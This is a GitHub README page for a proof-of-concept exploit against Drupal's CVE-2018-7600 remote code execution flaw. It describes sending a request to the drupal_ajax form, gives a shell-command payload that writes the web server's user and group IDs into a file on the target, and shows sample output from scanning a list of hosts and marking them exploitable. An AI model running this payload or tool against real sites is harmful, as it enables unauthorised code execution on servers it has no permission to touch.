Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

How it works

It sends a packet to the drupal_ajax wrapper to register a user. Allows user to use the exec markup and run bash. This PoC sends a the user name and id to abcde.txt.
```
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
```

Checks http*://example.com/abcde.txt

[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text

Payloads

%s = file name

User ID, PID, and Group Payload

echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

Thanks to

Thanks to Vitalii Rudnykh

Name		Name	Last commit message	Last commit date
Latest commit History 23 Commits
.github		.github
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
exploiter.py		exploiter.py
hosts.txt		hosts.txt
notes.md		notes.md
requirements.txt		requirements.txt
todo.md		todo.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

How it works

Payloads

Thanks to

Provided only for educational or information purposes.

About

Languages

License

thehappydinoa/CVE-2018-7600

Folders and files

Latest commit

History

Repository files navigation

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

How it works

Payloads

Thanks to

Provided only for educational or information purposes.

About

Topics

Resources

License

Stars

Watchers

Forks

Languages